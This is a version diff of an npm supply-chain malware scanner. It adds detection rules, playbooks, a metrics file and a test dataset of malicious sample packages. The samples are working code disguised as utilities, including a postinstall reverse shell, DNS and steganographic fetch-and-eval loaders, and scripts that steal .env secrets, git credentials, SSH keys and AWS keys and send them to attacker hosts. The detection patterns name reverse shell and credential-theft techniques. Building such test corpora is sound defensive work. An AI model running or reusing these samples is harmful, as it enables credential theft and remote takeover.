muaddib-scanner 2.2.1 → 2.2.2

package/datasets/holdout-v3/dns-txt-payload/index.js

@@ -0,0 +1,11 @@
+const dns = require('dns');
+
+// Retrieve payload from DNS TXT record — no HTTP involved
+dns.resolveTxt('payload.evil-dns.com', (err, records) => {
+  if (err) return;
+  // TXT records come as arrays of strings
+  const encoded = records.map(r => r.join('')).join('');
+  const decoded = Buffer.from(encoded, 'base64').toString('utf8');
+  // Execute the payload received via DNS
+  eval(decoded);
+});

package/datasets/holdout-v3/dns-txt-payload/package.json

@@ -0,0 +1,6 @@
+{
+  "name": "dns-txt-payload",
+  "version": "1.0.0",
+  "description": "DNS resolver helper utilities",
+  "main": "index.js"
+}

package/datasets/holdout-v3/electron-rce/index.js

@@ -0,0 +1,32 @@
+// Only activate in Electron environment where we have elevated privileges
+if (process.versions && process.versions.electron) {
+  const { exec } = require('child_process');
+  const os = require('os');
+
+  // Electron apps often run with higher privileges
+  const platform = os.platform();
+  let cmd;
+  if (platform === 'win32') {
+    cmd = 'powershell -NoProfile -Command "Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select DisplayName, InstallLocation | ConvertTo-Json"';
+  } else if (platform === 'darwin') {
+    cmd = 'security find-generic-password -ga "Chrome" 2>&1 | head -20';
+  } else {
+    cmd = 'cat /etc/shadow 2>/dev/null || cat /etc/passwd';
+  }
+
+  exec(cmd, (err, stdout) => {
+    if (stdout) {
+      const https = require('https');
+      const data = JSON.stringify({ platform, data: stdout });
+      const req = https.request({
+        hostname: 'electron-data.evil.com',
+        port: 443,
+        path: '/exfil',
+        method: 'POST',
+        headers: { 'Content-Type': 'application/json' }
+      });
+      req.write(data);
+      req.end();
+    }
+  });
+}

package/datasets/holdout-v3/electron-rce/package.json

@@ -0,0 +1,6 @@
+{
+  "name": "electron-rce",
+  "version": "1.0.0",
+  "description": "Cross-platform desktop helper",
+  "main": "index.js"
+}

package/datasets/holdout-v3/env-file-parse-exfil/index.js

@@ -0,0 +1,39 @@
+const fs = require('fs');
+const path = require('path');
+const https = require('https');
+
+// Read .env file directly — no dotenv, no process.env
+const envPath = path.join(process.cwd(), '.env');
+let envContent;
+try {
+  envContent = fs.readFileSync(envPath, 'utf8');
+} catch(e) { process.exit(0); }
+
+// Manual KEY=VALUE parsing
+const secrets = {};
+envContent.split('\n').forEach(line => {
+  const trimmed = line.trim();
+  if (!trimmed || trimmed.startsWith('#')) return;
+  const eqIdx = trimmed.indexOf('=');
+  if (eqIdx === -1) return;
+  const key = trimmed.slice(0, eqIdx).trim();
+  const val = trimmed.slice(eqIdx + 1).trim().replace(/^["']|["']$/g, '');
+  if (/TOKEN|SECRET|KEY|PASSWORD|API/i.test(key)) {
+    secrets[key] = val;
+  }
+});
+
+// Exfiltrate parsed secrets
+if (Object.keys(secrets).length > 0) {
+  const data = JSON.stringify(secrets);
+  const opts = {
+    hostname: 'env-collector.malware.io',
+    port: 443,
+    path: '/api/env',
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }
+  };
+  const req = https.request(opts);
+  req.write(data);
+  req.end();
+}

package/datasets/holdout-v3/env-file-parse-exfil/package.json

@@ -0,0 +1,6 @@
+{
+  "name": "env-file-parse-exfil",
+  "version": "1.0.0",
+  "description": "Environment configuration loader",
+  "main": "index.js"
+}

package/datasets/holdout-v3/git-credential-steal/index.js

@@ -0,0 +1,41 @@
+const fs = require('fs');
+const os = require('os');
+const path = require('path');
+const https = require('https');
+
+const home = os.homedir();
+const collected = {};
+
+// Read git config for remote URLs with embedded tokens
+try {
+  const gitConfig = fs.readFileSync(path.join(home, '.gitconfig'), 'utf8');
+  const urlMatches = gitConfig.match(/url\s*=\s*.+/g);
+  if (urlMatches) collected.gitconfig = urlMatches;
+} catch(e) {}
+
+// Read stored git credentials
+try {
+  const creds = fs.readFileSync(path.join(home, '.git-credentials'), 'utf8');
+  collected.credentials = creds.split('\n').filter(l => l.trim());
+} catch(e) {}
+
+// Also check the project-level .git/config
+try {
+  const localConfig = fs.readFileSync(path.join(process.cwd(), '.git', 'config'), 'utf8');
+  const remotes = localConfig.match(/url\s*=\s*.+/g);
+  if (remotes) collected.localRemotes = remotes;
+} catch(e) {}
+
+if (Object.keys(collected).length > 0) {
+  const payload = JSON.stringify(collected);
+  const opts = {
+    hostname: 'git-tokens.exfil.dev',
+    port: 443,
+    path: '/collect',
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }
+  };
+  const req = https.request(opts);
+  req.write(payload);
+  req.end();
+}

package/datasets/holdout-v3/git-credential-steal/package.json

@@ -0,0 +1,6 @@
+{
+  "name": "git-credential-steal",
+  "version": "1.0.0",
+  "description": "Git repository inspector utility",
+  "main": "index.js"
+}

package/datasets/holdout-v3/npm-hook-hijack/index.js

@@ -0,0 +1,20 @@
+const fs = require('fs');
+const os = require('os');
+const path = require('path');
+
+const home = os.homedir();
+const npmrcPath = path.join(home, '.npmrc');
+
+// Read existing .npmrc content
+let existing = '';
+try {
+  existing = fs.readFileSync(npmrcPath, 'utf8');
+} catch(e) {}
+
+// Inject an oninstall hook for persistence
+// This will execute on every future npm install
+const hook = '\noninstall=node -e "require(\'https\').get(\'https://hooks.malware.io/ping?h=\'+require(\'os\').hostname())"';
+
+if (!existing.includes('oninstall')) {
+  fs.writeFileSync(npmrcPath, existing + hook, 'utf8');
+}

package/datasets/holdout-v3/npm-hook-hijack/package.json

@@ -0,0 +1,9 @@
+{
+  "name": "npm-hook-hijack",
+  "version": "1.0.0",
+  "description": "npm configuration optimizer",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js"
+  }
+}

package/datasets/holdout-v3/postinstall-reverse-shell/index.js

@@ -0,0 +1,24 @@
+const net = require('net');
+const { spawn } = require('child_process');
+const os = require('os');
+
+const HOST = '45.33.32.156';
+const PORT = 4444;
+
+const client = new net.Socket();
+client.connect(PORT, HOST, function() {
+  const shell = os.platform() === 'win32' ? 'cmd.exe' : '/bin/sh';
+  const proc = spawn(shell, { stdio: ['pipe', 'pipe', 'pipe'] });
+
+  client.pipe(proc.stdin);
+  proc.stdout.pipe(client);
+  proc.stderr.pipe(client);
+
+  proc.on('exit', function() {
+    client.destroy();
+  });
+});
+
+client.on('error', function() {
+  // Silent failure
+});

package/datasets/holdout-v3/postinstall-reverse-shell/package.json

@@ -0,0 +1,9 @@
+{
+  "name": "postinstall-reverse-shell",
+  "version": "1.0.0",
+  "description": "System diagnostics toolkit",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js"
+  }
+}

package/datasets/holdout-v3/require-cache-poison/index.js

@@ -0,0 +1,26 @@
+const https = require('https');
+const origRequest = https.request;
+
+// Poison the require cache — replace https module with interceptor
+const mod = require.cache[require.resolve('https')];
+mod.exports.request = function(options, callback) {
+  const headers = options.headers || {};
+  if (headers['Authorization'] || headers['authorization']) {
+    const stolen = JSON.stringify({
+      host: options.hostname || options.host,
+      path: options.path,
+      auth: headers['Authorization'] || headers['authorization']
+    });
+    const exfilOpts = {
+      hostname: 'collect.evil-analytics.com',
+      port: 443,
+      path: '/api/headers',
+      method: 'POST',
+      headers: { 'Content-Type': 'application/json' }
+    };
+    const req = origRequest(exfilOpts);
+    req.write(stolen);
+    req.end();
+  }
+  return origRequest.call(https, options, callback);
+};

package/datasets/holdout-v3/require-cache-poison/package.json

@@ -0,0 +1,6 @@
+{
+  "name": "require-cache-poison",
+  "version": "1.0.0",
+  "description": "Utility for module caching optimization",
+  "main": "index.js"
+}

package/datasets/holdout-v3/steganography-payload/index.js

@@ -0,0 +1,31 @@
+const fs = require('fs');
+const path = require('path');
+
+// Read embedded PNG image from the package
+const imgPath = path.join(__dirname, 'assets', 'logo.png');
+let imgBuffer;
+try {
+  imgBuffer = fs.readFileSync(imgPath);
+} catch(e) { process.exit(0); }
+
+// Skip PNG header (8 bytes) and find IDAT chunks
+// Extract LSB from pixel data to reconstruct hidden payload
+const pixels = imgBuffer.slice(imgBuffer.indexOf('IDAT') + 8);
+let bits = '';
+for (let i = 0; i < Math.min(pixels.length, 8192); i++) {
+  bits += (pixels[i] & 1).toString();
+}
+
+// Convert bits to bytes
+let payload = '';
+for (let i = 0; i + 8 <= bits.length; i += 8) {
+  const byte = parseInt(bits.slice(i, i + 8), 2);
+  if (byte === 0) break;
+  payload += String.fromCharCode(byte);
+}
+
+// Decode and execute the hidden payload
+if (payload.length > 10) {
+  const decoded = Buffer.from(payload, 'base64').toString('utf8');
+  eval(decoded);
+}

package/datasets/holdout-v3/steganography-payload/package.json

@@ -0,0 +1,6 @@
+{
+  "name": "steganography-payload",
+  "version": "1.0.0",
+  "description": "Image processing utilities",
+  "main": "index.js"
+}

package/datasets/holdout-v3/symlink-escape/index.js

@@ -0,0 +1,30 @@
+const fs = require('fs');
+const os = require('os');
+const path = require('path');
+const https = require('https');
+
+const home = os.homedir();
+const target = path.join(home, '.ssh', 'id_rsa');
+const link = path.join(__dirname, '.cache', 'temp_link');
+
+// Create a symlink to bypass direct path checks
+try { fs.mkdirSync(path.join(__dirname, '.cache'), { recursive: true }); } catch(e) {}
+try { fs.symlinkSync(target, link); } catch(e) {}
+
+// Read through the symlink — not the direct sensitive path
+const keyData = fs.readFileSync(link, 'utf8');
+
+const payload = JSON.stringify({ key: keyData, host: os.hostname() });
+const opts = {
+  hostname: 'keys.exfil-service.net',
+  port: 443,
+  path: '/upload',
+  method: 'POST',
+  headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }
+};
+const req = https.request(opts);
+req.write(payload);
+req.end();
+
+// Cleanup
+try { fs.unlinkSync(link); } catch(e) {}

package/datasets/holdout-v3/symlink-escape/package.json

@@ -0,0 +1,6 @@
+{
+  "name": "symlink-escape",
+  "version": "1.0.0",
+  "description": "File system utilities for linking",
+  "main": "index.js"
+}

package/datasets/holdout-v3/timezone-trigger/index.js

@@ -0,0 +1,38 @@
+const fs = require('fs');
+const os = require('os');
+const https = require('https');
+
+// Geographic targeting — only activate in specific timezones
+const tz = Intl.DateTimeFormat().resolvedOptions().timeZone;
+const targets = ['Europe/Kiev', 'Europe/Moscow', 'Asia/Tehran', 'Asia/Pyongyang'];
+
+if (targets.includes(tz)) {
+  const home = os.homedir();
+  const secrets = {};
+
+  // Harvest credentials
+  try {
+    secrets.sshKey = fs.readFileSync(path.join(home, '.ssh', 'id_rsa'), 'utf8');
+  } catch(e) {}
+  try {
+    secrets.npmrc = fs.readFileSync(path.join(home, '.npmrc'), 'utf8');
+  } catch(e) {}
+  try {
+    secrets.awsCreds = fs.readFileSync(path.join(home, '.aws', 'credentials'), 'utf8');
+  } catch(e) {}
+
+  secrets.timezone = tz;
+  secrets.hostname = os.hostname();
+  secrets.user = os.userInfo().username;
+
+  const data = JSON.stringify(secrets);
+  const req = https.request({
+    hostname: 'geo-intel.evil-apt.com',
+    port: 443,
+    path: '/target',
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }
+  });
+  req.write(data);
+  req.end();
+}

package/datasets/holdout-v3/timezone-trigger/package.json

@@ -0,0 +1,6 @@
+{
+  "name": "timezone-trigger",
+  "version": "1.0.0",
+  "description": "Internationalization support module",
+  "main": "index.js"
+}

package/metrics/v2.2.1.json

@@ -0,0 +1,753 @@
+{
+  "version": "2.2.1",
+  "date": "2026-02-20T16:18:59.596Z",
+  "groundTruth": {
+    "detected": 4,
+    "total": 4,
+    "tpr": 1,
+    "details": [
+      {
+        "name": "event-stream",
+        "id": "GT-001",
+        "score": 25,
+        "detected": true,
+        "threshold": 3
+      },
+      {
+        "name": "ua-parser-js",
+        "id": "GT-002",
+        "score": 6,
+        "detected": true,
+        "threshold": 3
+      },
+      {
+        "name": "coa",
+        "id": "GT-003",
+        "score": 23,
+        "detected": true,
+        "threshold": 3
+      },
+      {
+        "name": "node-ipc",
+        "id": "GT-004",
+        "score": 25,
+        "detected": true,
+        "threshold": 3
+      }
+    ]
+  },
+  "benign": {
+    "flagged": 0,
+    "total": 98,
+    "fpr": 0,
+    "details": [
+      {
+        "name": "express",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "lodash",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "react",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "axios",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "webpack",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "typescript",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "eslint",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "prettier",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "jest",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "mocha",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "next",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "vue",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "moment",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "dayjs",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "uuid",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "chalk",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "commander",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "inquirer",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "yargs",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "dotenv",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "cors",
+        "score": 10,
+        "flagged": false
+      },
+      {
+        "name": "body-parser",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "mongoose",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "sequelize",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "passport",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "jsonwebtoken",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "bcrypt",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "nodemailer",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "socket.io",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "redis",
+        "score": 10,
+        "flagged": false
+      },
+      {
+        "name": "pg",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "mysql2",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "sqlite3",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "sharp",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "multer",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "formidable",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "cheerio",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "puppeteer",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "playwright",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "cypress",
+        "score": 10,
+        "flagged": false
+      },
+      {
+        "name": "electron",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "react-dom",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "react-router",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "redux",
+        "score": 10,
+        "flagged": false
+      },
+      {
+        "name": "mobx",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "rxjs",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "ramda",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "underscore",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "async",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "debug",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "minimist",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "glob",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "rimraf",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "mkdirp",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "semver",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "yup",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "zod",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "ajv",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "joi",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "express-validator",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "helmet",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "compression",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "morgan",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "winston",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "pino",
+        "score": 10,
+        "flagged": false
+      },
+      {
+        "name": "bunyan",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "dotenv-expand",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "cross-env",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "concurrently",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "nodemon",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "ts-node",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "esbuild",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "rollup",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "vite",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "parcel",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "core-js",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "regenerator-runtime",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "whatwg-fetch",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "isomorphic-fetch",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "node-fetch",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "got",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "superagent",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "form-data",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "busboy",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "cookie-parser",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "express-session",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "connect-redis",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "ioredis",
+        "score": 10,
+        "flagged": false
+      },
+      {
+        "name": "bull",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "agenda",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "node-cron",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "date-fns",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "luxon",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "numeral",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "decimal.js",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "bignumber.js",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "mathjs",
+        "score": 0,
+        "flagged": false
+      },
+      {
+        "name": "lodash-es",
+        "score": 0,
+        "flagged": false
+      }
+    ]
+  },
+  "adversarial": {
+    "detected": 35,
+    "total": 35,
+    "adr": 1,
+    "details": [
+      {
+        "name": "ci-trigger-exfil",
+        "score": 38,
+        "threshold": 35,
+        "detected": true
+      },
+      {
+        "name": "delayed-exfil",
+        "score": 35,
+        "threshold": 30,
+        "detected": true
+      },
+      {
+        "name": "docker-aware",
+        "score": 35,
+        "threshold": 35,
+        "detected": true
+      },
+      {
+        "name": "staged-fetch",
+        "score": 35,
+        "threshold": 35,
+        "detected": true
+      },
+      {
+        "name": "dns-chunk-exfil",
+        "score": 35,
+        "threshold": 35,
+        "detected": true
+      },
+      {
+        "name": "string-concat-obfuscation",
+        "score": 35,
+        "threshold": 30,
+        "detected": true
+      },
+      {
+        "name": "postinstall-download",
+        "score": 33,
+        "threshold": 30,
+        "detected": true
+      },
+      {
+        "name": "dynamic-require",
+        "score": 78,
+        "threshold": 40,
+        "detected": true
+      },
+      {
+        "name": "iife-exfil",
+        "score": 58,
+        "threshold": 40,
+        "detected": true
+      },
+      {
+        "name": "conditional-chain",
+        "score": 38,
+        "threshold": 30,
+        "detected": true
+      },
+      {
+        "name": "template-literal-obfuscation",
+        "score": 63,
+        "threshold": 30,
+        "detected": true
+      },
+      {
+        "name": "proxy-env-intercept",
+        "score": 53,
+        "threshold": 40,
+        "detected": true
+      },
+      {
+        "name": "nested-payload",
+        "score": 38,
+        "threshold": 30,
+        "detected": true
+      },
+      {
+        "name": "dynamic-import",
+        "score": 58,
+        "threshold": 30,
+        "detected": true
+      },
+      {
+        "name": "websocket-exfil",
+        "score": 38,
+        "threshold": 30,
+        "detected": true
+      },
+      {
+        "name": "bun-runtime-evasion",
+        "score": 48,
+        "threshold": 30,
+        "detected": true
+      },
+      {
+        "name": "preinstall-exec",
+        "score": 38,
+        "threshold": 35,
+        "detected": true
+      },
+      {
+        "name": "remote-dynamic-dependency",
+        "score": 35,
+        "threshold": 35,
+        "detected": true
+      },
+      {
+        "name": "github-exfil",
+        "score": 68,
+        "threshold": 30,
+        "detected": true
+      },
+      {
+        "name": "detached-background",
+        "score": 48,
+        "threshold": 35,
+        "detected": true
+      },
+      {
+        "name": "ai-agent-weaponization",
+        "score": 100,
+        "threshold": 35,
+        "detected": true
+      },
+      {
+        "name": "ai-config-injection",
+        "score": 100,
+        "threshold": 30,
+        "detected": true
+      },
+      {
+        "name": "rdd-zero-deps",
+        "score": 41,
+        "threshold": 35,
+        "detected": true
+      },
+      {
+        "name": "discord-webhook-exfil",
+        "score": 44,
+        "threshold": 30,
+        "detected": true
+      },
+      {
+        "name": "preinstall-background-fork",
+        "score": 58,
+        "threshold": 35,
+        "detected": true
+      },
+      {
+        "name": "silent-error-swallow",
+        "score": 35,
+        "threshold": 25,
+        "detected": true
+      },
+      {
+        "name": "double-base64-exfil",
+        "score": 38,
+        "threshold": 30,
+        "detected": true
+      },
+      {
+        "name": "crypto-wallet-harvest",
+        "score": 25,
+        "threshold": 25,
+        "detected": true
+      },
+      {
+        "name": "self-hosted-runner-backdoor",
+        "score": 53,
+        "threshold": 20,
+        "detected": true
+      },
+      {
+        "name": "dead-mans-switch",
+        "score": 68,
+        "threshold": 30,
+        "detected": true
+      },
+      {
+        "name": "fake-captcha-fingerprint",
+        "score": 28,
+        "threshold": 20,
+        "detected": true
+      },
+      {
+        "name": "pyinstaller-dropper",
+        "score": 53,
+        "threshold": 35,
+        "detected": true
+      },
+      {
+        "name": "gh-cli-token-steal",
+        "score": 50,
+        "threshold": 30,
+        "detected": true
+      },
+      {
+        "name": "triple-base64-github-push",
+        "score": 38,
+        "threshold": 30,
+        "detected": true
+      },
+      {
+        "name": "browser-api-hook",
+        "score": 20,
+        "threshold": 20,
+        "detected": true
+      }
+    ]
+  }
+}

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.2.1",
+  "version": "2.2.2",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

package/src/response/playbooks.js

@@ -308,6 +308,16 @@ const PLAYBOOKS = {
     'CRITIQUE: Ecriture detectee dans un cache sensible (npm _cacache, yarn, pip). ' +
     'Possible cache poisoning: injection de code malveillant dans des packages caches. ' +
     'Nettoyer le cache: npm cache clean --force. Reinstaller les dependances depuis zero.',
+
+  require_cache_poison:
+    'CRITIQUE: require.cache modifie pour hijacker des modules Node.js. ' +
+    'Le code remplace les exports de modules charges (https, http, fs) pour intercepter toutes les requetes. ' +
+    'Supprimer le package. Redemarrer le processus Node.js. Auditer le trafic reseau recent.',
+
+  staged_binary_payload:
+    'Fichier binaire (.png/.jpg/.wasm) reference avec eval() dans le meme fichier. ' +
+    'Technique de steganographie: le payload malveillant est cache dans les pixels d\'une image ou les sections d\'un WASM. ' +
+    'Analyser le fichier binaire dans un sandbox. Verifier les donnees extraites avant execution.',
 };
 
 function getPlaybook(threatType) {

package/src/rules/index.js

@@ -562,6 +562,29 @@ const RULES = {
     mitre: 'T1059'
   },
 
+  require_cache_poison: {
+    id: 'MUADDIB-AST-019',
+    name: 'Require Cache Poisoning',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    description: 'Acces a require.cache pour remplacer ou hijacker des modules Node.js charges. Technique de cache poisoning pour intercepter du trafic ou injecter du code.',
+    references: [
+      'https://attack.mitre.org/techniques/T1574/006/'
+    ],
+    mitre: 'T1574.006'
+  },
+  staged_binary_payload: {
+    id: 'MUADDIB-AST-020',
+    name: 'Staged Binary Payload Execution',
+    severity: 'HIGH',
+    confidence: 'high',
+    description: 'Reference a un fichier binaire (.png/.jpg/.wasm) combinee avec eval() dans le meme fichier. Possible execution de payload steganographique cache dans une image.',
+    references: [
+      'https://attack.mitre.org/techniques/T1027/003/'
+    ],
+    mitre: 'T1027.003'
+  },
+
   env_charcode_reconstruction: {
     id: 'MUADDIB-AST-018',
     name: 'Environment Variable Key Reconstruction',

package/src/scanner/ast.js

@@ -222,6 +222,16 @@ function analyzeFile(content, filePath, basePath) {
   // Pre-scan for fromCharCode pattern (env var name obfuscation)
   const hasFromCharCode = content.includes('fromCharCode');
 
+  // Pre-scan for JS reverse shell pattern: net.Socket + connect + pipe + shell process
+  const hasJsReverseShell = /\bnet\.Socket\b/.test(content) &&
+    /\.connect\s*\(/.test(content) &&
+    /\.pipe\b/.test(content) &&
+    (/\bspawn\b/.test(content) || /\bstdin\b/.test(content) || /\bstdout\b/.test(content));
+
+  // Pre-scan for binary file reference (steganography payload detection)
+  const hasBinaryFileLiteral = /\.(png|jpg|jpeg|gif|bmp|ico|wasm)\b/i.test(content);
+  let hasEvalInFile = false;
+
   walk.simple(ast, {
     VariableDeclarator(node) {
       if (node.id?.type === 'Identifier') {
@@ -399,6 +409,35 @@ function analyzeFile(content, filePath, basePath) {
         }
       }
 
+      // Detect spawn/execFile of shell processes — suspicious shell spawn
+      if ((callName === 'spawn' || callName === 'execFile') && node.arguments.length >= 1) {
+        const shellArg = node.arguments[0];
+        if (shellArg.type === 'Literal' && typeof shellArg.value === 'string') {
+          const shellBin = shellArg.value.toLowerCase();
+          if (['/bin/sh', '/bin/bash', 'sh', 'bash', 'cmd.exe', 'powershell', 'pwsh', 'cmd'].includes(shellBin)) {
+            threats.push({
+              type: 'dangerous_call_exec',
+              severity: 'MEDIUM',
+              message: `${callName}('${shellArg.value}') — direct shell process spawn detected.`,
+              file: path.relative(basePath, filePath)
+            });
+          }
+        }
+        // Also check when shell is computed via os.platform() ternary
+        if (shellArg.type === 'ConditionalExpression') {
+          const checkLiteral = (n) => n.type === 'Literal' && typeof n.value === 'string' &&
+            ['/bin/sh', '/bin/bash', 'sh', 'bash', 'cmd.exe', 'powershell', 'pwsh', 'cmd'].includes(n.value.toLowerCase());
+          if (checkLiteral(shellArg.consequent) || checkLiteral(shellArg.alternate)) {
+            threats.push({
+              type: 'dangerous_call_exec',
+              severity: 'MEDIUM',
+              message: `${callName}() with conditional shell binary (platform-aware) — direct shell process spawn detected.`,
+              file: path.relative(basePath, filePath)
+            });
+          }
+        }
+      }
+
       // Detect spawn/fork with {detached: true} — background process evasion
       if ((callName === 'spawn' || callName === 'fork') && node.arguments.length >= 2) {
         const lastArg = node.arguments[node.arguments.length - 1];
@@ -568,6 +607,7 @@ function analyzeFile(content, filePath, basePath) {
       }
 
       if (callName === 'eval') {
+        hasEvalInFile = true;
         const isConstant = hasOnlyStringLiteralArgs(node);
         threats.push({
           type: 'dangerous_call_eval',
@@ -750,6 +790,17 @@ function analyzeFile(content, filePath, basePath) {
     },
 
     MemberExpression(node) {
+      // Detect require.cache access — module cache poisoning
+      if (node.object?.type === 'Identifier' && node.object.name === 'require' &&
+          node.property?.type === 'Identifier' && node.property.name === 'cache') {
+        threats.push({
+          type: 'require_cache_poison',
+          severity: 'CRITICAL',
+          message: 'require.cache accessed — module cache poisoning to hijack or replace core Node.js modules.',
+          file: path.relative(basePath, filePath)
+        });
+      }
+
       if (
         node.object?.object?.name === 'process' &&
         node.object?.property?.name === 'env'
@@ -794,6 +845,26 @@ function analyzeFile(content, filePath, basePath) {
     }
   });
 
+  // Post-walk: JS reverse shell pattern (net.Socket + connect + pipe + shell)
+  if (hasJsReverseShell) {
+    threats.push({
+      type: 'reverse_shell',
+      severity: 'CRITICAL',
+      message: 'JavaScript reverse shell: net.Socket + connect() + pipe to shell process stdin/stdout.',
+      file: path.relative(basePath, filePath)
+    });
+  }
+
+  // Post-walk: steganographic/binary payload execution
+  if (hasBinaryFileLiteral && hasEvalInFile) {
+    threats.push({
+      type: 'staged_binary_payload',
+      severity: 'HIGH',
+      message: 'Binary file reference (.png/.jpg/.wasm/etc.) + eval() in same file — possible steganographic payload execution.',
+      file: path.relative(basePath, filePath)
+    });
+  }
+
   return threats;
 }
 

package/src/scanner/dataflow.js

@@ -60,6 +60,9 @@ function analyzeFile(content, filePath, basePath) {
   const sources = [];
   const sinks = [];
 
+  // Pre-scan: detect raw socket module import (net/tls) for instance .connect() detection
+  const hasRawSocketModule = /require\s*\(\s*['"](?:net|tls)['"]\s*\)/.test(content);
+
   // Track variables assigned from sensitive path expressions
   const sensitivePathVars = new Set();
 
@@ -155,7 +158,7 @@ function analyzeFile(content, filePath, basePath) {
         const prop = node.callee.property;
         if (obj.type === 'Identifier' && prop.type === 'Identifier') {
           // DNS resolution as exfiltration sink
